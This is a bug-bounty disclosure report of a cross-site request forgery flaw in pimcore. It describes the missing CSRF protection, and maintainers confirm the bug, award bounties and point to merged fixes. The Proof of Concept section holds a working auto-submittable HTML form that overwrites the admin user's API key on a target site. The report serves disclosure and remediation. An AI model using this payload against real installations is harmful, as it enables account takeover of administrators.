Cross-Site Request Forgery (CSRF) in pimcore/pimcore

Valid

Reported on

Jul 25th 2021


✍️ Description

Your application have not any CSRF protection and also You set the SameSite attribute to Lax, this means if you want to alter some data with GET HTTP requests, then your site should be vulnerable to CSRF attacks with no doubt.

First you run this Html payload and then you should see that the admin's API altered to following key : 63e2f50d60d3412c407703cf16bc34265cf15ae1bd302ed7351fff4afe4a5b12

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://x.pimcore.fun/admin/customermanagementframework/settings/webservice-users">
      <input type="hidden" name="xaction" value="update" />
      <input type="hidden" name="&#95;dc" value="" />
      <input type="hidden" name="data" value="&#123;&quot;id&quot;&#58;1&#44;&quot;name&quot;&#58;&quot;admin&quot;&#44;&quot;firstname&quot;&#58;null&#44;&quot;lastname&quot;&#58;null&#44;&quot;email&quot;&#58;null&#44;&quot;apiKey&quot;&#58;&quot;63e2f50d60d3412c407703cf16bc34265cf15ae1bd302ed7351fff4afe4a5b12&quot;&#44;&quot;image&quot;&#58;&quot;&#47;admin&#47;user&#47;get&#45;image&#63;id&#61;1&quot;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

I test this Payload on both stable and dev Editions.(on demo sites)

💥 Impact

This vulnerability is capable of take control of any user's account.

Occurences

Ziding Zhang
4 months ago

Admin


Hey amammad, just contacted pimcore re: this report. Waiting to hear back, good job!

amammad
4 months ago

Researcher


Hi dear pimcore team, if you want more help just tell me.

Bernhard Rusch
4 months ago

@amammad thanks!

Bernhard Rusch validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch confirmed that a fix has been merged on 8aa0ca 4 months ago
Bernhard Rusch has been awarded the fix bounty
Bernhard Rusch
4 months ago

https://github.com/pimcore/customer-data-framework/pull/227 fixes the problem as well.